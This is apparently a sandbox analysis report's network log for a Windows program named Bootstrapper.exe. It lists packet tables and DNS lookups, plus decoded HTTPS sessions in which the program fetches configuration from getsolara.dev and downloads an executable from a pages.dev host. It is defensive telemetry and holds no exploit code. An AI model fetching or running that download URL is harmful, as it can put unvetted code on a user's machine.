Nov 14, 2024 04:52:42.606683969 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.606705904 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.646075964 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646106005 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646260023 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646399975 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.646400928 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.646419048 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646471977 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646511078 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646522045 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.646572113 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.646585941 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646648884 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646673918 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646795034 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646811962 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646869898 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.646869898 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.646869898 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.646869898 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.646917105 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646933079 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646962881 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.646991014 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.647037029 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.647082090 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.647082090 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.720546961 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.720575094 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.720827103 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.720827103 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.720896959 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.720983982 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.721162081 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.721214056 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.721359968 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.721359968 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.721431017 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.721501112 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.761475086 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.761512041 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.761750937 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.761817932 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.761900902 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.908406019 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.908437014 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.908602953 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.908612967 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.908612967 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.908691883 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.908746958 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.908756018 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.908766985 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.908777952 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.908791065 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.908801079 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.908854008 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.908899069 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.908919096 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.909143925 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.909161091 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.950258017 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.023766994 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.023803949 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.023940086 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.023978949 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.023978949 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.024017096 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.024066925 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.024087906 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.024089098 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.024087906 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.024112940 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.024121046 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.024166107 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.024194002 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.075258970 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.107440948 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.107480049 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.107590914 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.107672930 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.107673883 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.107673883 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.107745886 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.107785940 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.107826948 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.107844114 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.107844114 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.107861996 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.107894897 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.107896090 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.107928038 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.107964039 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.107991934 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.108036995 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.108050108 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.108083963 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.108100891 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.108104944 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.108114958 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.108153105 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.108186960 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.108237982 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.108253956 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.108287096 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.108320951 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.182269096 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.182298899 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.182472944 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.182472944 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.182543993 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.182610035 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.222790956 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.222819090 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.222981930 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.222981930 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.223057032 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.223114014 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.296534061 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.296617985 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:43.296730995 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.296731949 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:43.297343016 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:44.501240015 CET	49734	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:44.501271009 CET	443	49734	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:44.501348972 CET	49734	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:44.505192041 CET	49734	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:44.505208969 CET	443	49734	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.120485067 CET	443	49734	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.121021986 CET	49734	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.122524023 CET	49734	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.122543097 CET	443	49734	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.123044968 CET	443	49734	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.169015884 CET	49734	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.199850082 CET	49734	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.243355989 CET	443	49734	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.363991976 CET	443	49734	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.364242077 CET	443	49734	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.364631891 CET	49734	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.374329090 CET	49734	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.381438971 CET	49735	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.381473064 CET	443	49735	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.381547928 CET	49735	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.381916046 CET	49735	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.381954908 CET	443	49735	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.986171961 CET	443	49735	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.986502886 CET	49735	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.988348961 CET	49735	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:45.988379955 CET	443	49735	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.988723993 CET	443	49735	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:45.989871979 CET	49735	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:46.031402111 CET	443	49735	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:46.163613081 CET	443	49735	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:46.163878918 CET	443	49735	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:46.164067030 CET	49735	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:46.164414883 CET	49735	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:47.003180027 CET	49736	443	192.168.2.4	128.116.123.3
Nov 14, 2024 04:52:47.003212929 CET	443	49736	128.116.123.3	192.168.2.4
Nov 14, 2024 04:52:47.003340960 CET	49736	443	192.168.2.4	128.116.123.3
Nov 14, 2024 04:52:47.003742933 CET	49736	443	192.168.2.4	128.116.123.3
Nov 14, 2024 04:52:47.003763914 CET	443	49736	128.116.123.3	192.168.2.4
Nov 14, 2024 04:52:47.851469040 CET	443	49736	128.116.123.3	192.168.2.4
Nov 14, 2024 04:52:47.851600885 CET	49736	443	192.168.2.4	128.116.123.3
Nov 14, 2024 04:52:47.853323936 CET	49736	443	192.168.2.4	128.116.123.3
Nov 14, 2024 04:52:47.853343964 CET	443	49736	128.116.123.3	192.168.2.4
Nov 14, 2024 04:52:47.853831053 CET	443	49736	128.116.123.3	192.168.2.4
Nov 14, 2024 04:52:47.854692936 CET	49736	443	192.168.2.4	128.116.123.3
Nov 14, 2024 04:52:47.895349026 CET	443	49736	128.116.123.3	192.168.2.4
Nov 14, 2024 04:52:48.299719095 CET	443	49736	128.116.123.3	192.168.2.4
Nov 14, 2024 04:52:48.299885988 CET	443	49736	128.116.123.3	192.168.2.4
Nov 14, 2024 04:52:48.299947977 CET	49736	443	192.168.2.4	128.116.123.3
Nov 14, 2024 04:52:48.306288004 CET	49736	443	192.168.2.4	128.116.123.3
Nov 14, 2024 04:52:50.105518103 CET	49737	443	192.168.2.4	104.20.23.46
Nov 14, 2024 04:52:50.105544090 CET	443	49737	104.20.23.46	192.168.2.4
Nov 14, 2024 04:52:50.105778933 CET	49737	443	192.168.2.4	104.20.23.46
Nov 14, 2024 04:52:50.105911016 CET	49737	443	192.168.2.4	104.20.23.46
Nov 14, 2024 04:52:50.105921030 CET	443	49737	104.20.23.46	192.168.2.4
Nov 14, 2024 04:52:50.781404972 CET	443	49737	104.20.23.46	192.168.2.4
Nov 14, 2024 04:52:50.782938957 CET	49737	443	192.168.2.4	104.20.23.46
Nov 14, 2024 04:52:50.785887957 CET	49737	443	192.168.2.4	104.20.23.46
Nov 14, 2024 04:52:50.785916090 CET	443	49737	104.20.23.46	192.168.2.4
Nov 14, 2024 04:52:50.786448002 CET	443	49737	104.20.23.46	192.168.2.4
Nov 14, 2024 04:52:50.789144039 CET	49737	443	192.168.2.4	104.20.23.46
Nov 14, 2024 04:52:50.831384897 CET	443	49737	104.20.23.46	192.168.2.4
Nov 14, 2024 04:52:51.253226995 CET	443	49737	104.20.23.46	192.168.2.4
Nov 14, 2024 04:52:51.253504038 CET	443	49737	104.20.23.46	192.168.2.4
Nov 14, 2024 04:52:51.253648996 CET	49737	443	192.168.2.4	104.20.23.46
Nov 14, 2024 04:52:51.254057884 CET	49737	443	192.168.2.4	104.20.23.46

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2024 04:52:36.502001047 CET	62924	53	192.168.2.4	1.1.1.1
Nov 14, 2024 04:52:36.508956909 CET	53	62924	1.1.1.1	192.168.2.4
Nov 14, 2024 04:52:41.124620914 CET	64269	53	192.168.2.4	1.1.1.1
Nov 14, 2024 04:52:41.133327961 CET	53	64269	1.1.1.1	192.168.2.4
Nov 14, 2024 04:52:46.835529089 CET	63871	53	192.168.2.4	1.1.1.1
Nov 14, 2024 04:52:47.001319885 CET	53	63871	1.1.1.1	192.168.2.4
Nov 14, 2024 04:52:50.096646070 CET	64464	53	192.168.2.4	1.1.1.1
Nov 14, 2024 04:52:50.104923964 CET	53	64464	1.1.1.1	192.168.2.4
Nov 14, 2024 04:52:51.255826950 CET	56957	53	192.168.2.4	1.1.1.1
Nov 14, 2024 04:52:51.262845039 CET	53	56957	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 14, 2024 04:52:36.502001047 CET	192.168.2.4	1.1.1.1	0x8023	Standard query (0)	getsolara.dev	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:41.124620914 CET	192.168.2.4	1.1.1.1	0x63f9	Standard query (0)	4d38a1ec.solaraweb-alj.pages.dev	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:46.835529089 CET	192.168.2.4	1.1.1.1	0xc0f4	Standard query (0)	clientsettings.roblox.com	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:50.096646070 CET	192.168.2.4	1.1.1.1	0x6857	Standard query (0)	www.nodejs.org	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:51.255826950 CET	192.168.2.4	1.1.1.1	0xc26b	Standard query (0)	nodejs.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 14, 2024 04:52:36.508956909 CET	1.1.1.1	192.168.2.4	0x8023	No error (0)	getsolara.dev		104.21.93.27	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:36.508956909 CET	1.1.1.1	192.168.2.4	0x8023	No error (0)	getsolara.dev		172.67.203.125	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:41.133327961 CET	1.1.1.1	192.168.2.4	0x63f9	No error (0)	4d38a1ec.solaraweb-alj.pages.dev		172.66.44.59	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:41.133327961 CET	1.1.1.1	192.168.2.4	0x63f9	No error (0)	4d38a1ec.solaraweb-alj.pages.dev		172.66.47.197	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:47.001319885 CET	1.1.1.1	192.168.2.4	0xc0f4	No error (0)	clientsettings.roblox.com	titanium.roblox.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 14, 2024 04:52:47.001319885 CET	1.1.1.1	192.168.2.4	0xc0f4	No error (0)	titanium.roblox.com	edge-term4.roblox.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 14, 2024 04:52:47.001319885 CET	1.1.1.1	192.168.2.4	0xc0f4	No error (0)	edge-term4.roblox.com	edge-term4-fra2.roblox.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 14, 2024 04:52:47.001319885 CET	1.1.1.1	192.168.2.4	0xc0f4	No error (0)	edge-term4-fra2.roblox.com		128.116.123.3	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:50.104923964 CET	1.1.1.1	192.168.2.4	0x6857	No error (0)	www.nodejs.org		104.20.23.46	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:50.104923964 CET	1.1.1.1	192.168.2.4	0x6857	No error (0)	www.nodejs.org		104.20.22.46	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:51.262845039 CET	1.1.1.1	192.168.2.4	0xc26b	No error (0)	nodejs.org		104.20.23.46	A (IP address)	IN (0x0001)	false
Nov 14, 2024 04:52:51.262845039 CET	1.1.1.1	192.168.2.4	0xc26b	No error (0)	nodejs.org		104.20.22.46	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

getsolara.dev

4d38a1ec.solaraweb-alj.pages.dev

clientsettings.roblox.com

www.nodejs.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.93.27	443	7428	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 03:52:37 UTC	81	OUT	GET /asset/discord.json HTTP/1.1 Host: getsolara.dev Connection: Keep-Alive
2024-11-14 03:52:37 UTC	1021	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 03:52:37 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSPpHuYsEwXYkdfzVwAyoGzcLCGRvAg0eVCRPwo7X1ZvpnV9ni5j%2FAB1PE8hpUxGqXXd3oP29Hu3CeLhX4hTPSkvn08QNIVs3DibL%2FBw5%2BIv08TUv2JoAcy%2FQrnW9odS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Strict-Transport-Security: max-age=0 Server: cloudflare CF-RAY: 8e240cc0fd356c54-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1096&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2812&recv_bytes=695&delivery_rate=2585714&cwnd=250&unsent_bytes=0&cid=c472a2929eb4b702&ts=250&x=0"
2024-11-14 03:52:37 UTC	109	IN	Data Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
2024-11-14 03:52:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.93.27	443	7428	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 03:52:40 UTC	56	OUT	GET /api/endpoint.json HTTP/1.1 Host: getsolara.dev
2024-11-14 03:52:40 UTC	1019	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 03:52:40 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: W/"f6b52a565df2f13c59cdfa7bdef89298" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZSKtvm5JYeppU9wfIpQjaPt5X2vdy8oDMsvquuinwKZOVus1CH%2FJO64qhuxeUB6vhDxJTZpQYegsoROzBr%2B3VzxbKbD3yuyIhBb0xCoYyQXwviAHpV3G8%2FRKZmUGzbZR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding cf-cache-status: DYNAMIC Strict-Transport-Security: max-age=0 Server: cloudflare CF-RAY: 8e240cd33f7ce9b9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2071&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2813&recv_bytes=694&delivery_rate=1356440&cwnd=251&unsent_bytes=0&cid=0a878b15280d0286&ts=204&x=0"
2024-11-14 03:52:40 UTC	350	IN	Data Raw: 32 31 63 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 33 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 33 32 66 33 36 61 63 39 34 34 62 33 34 39 31 33 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 32 38 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 34 64 33 38 61 31 65 63 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73 Data Ascii: 21c{ "BootstrapperVersion": "1.23", "SupportedClient": "version-32f36ac944b34913", "SoftwareVersion": "3.128", "BootstrapperUrl": "https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
2024-11-14 03:52:40 UTC	197	IN	Data Raw: 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 34 66 33 61 34 65 65 34 66 65 30 63 37 63 37 36 61 30 65 36 39 34 30 36 36 61 35 64 33 62 33 61 36 37 37 66 31 32 35 39 65 35 62 33 33 30 35 32 66 65 66 35 36 37 37 39 66 36 36 34 35 32 34 32 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 20 75 70 64 61 74 65 64 22 0a 7d 0d 0a Data Ascii: tps://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"4f3a4ee4fe0c7c76a0e694066a5d3b3a677f1259e5b33052fef56779f6645242", "Changelog":"[+] updated"}
2024-11-14 03:52:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	172.66.44.59	443	7428	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 03:52:41 UTC	120	OUT	GET /download/static/files/Bootstrapper.exe HTTP/1.1 Host: 4d38a1ec.solaraweb-alj.pages.dev Connection: Keep-Alive
2024-11-14 03:52:41 UTC	996	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 03:52:41 GMT Content-Type: application/octet-stream Content-Length: 819200 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: "847541a29d239bd3737d299484ceec4f" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-robots-tag: noindex Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JF6t1qlE8vf1v7d1Da%2BbGJA5dS6Foe%2BzV%2FL%2FQxTkK%2BMdlucTU%2BCqU%2FnQB7itaMJ2y9hGom3JtnNrI2yr4iEVpnFb8larArdELkrzKCzQvzxgQWu4ufyIap0rPNwpWQ3IqgbRWT7y3S1hx9dfXxmMXBwrPw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e240cdd5e1eddb4-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1271&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2861&recv_bytes=734&delivery_rate=2326104&cwnd=32&unsent_bytes=0&cid=30b701bd85bac579&ts=178&x=0"
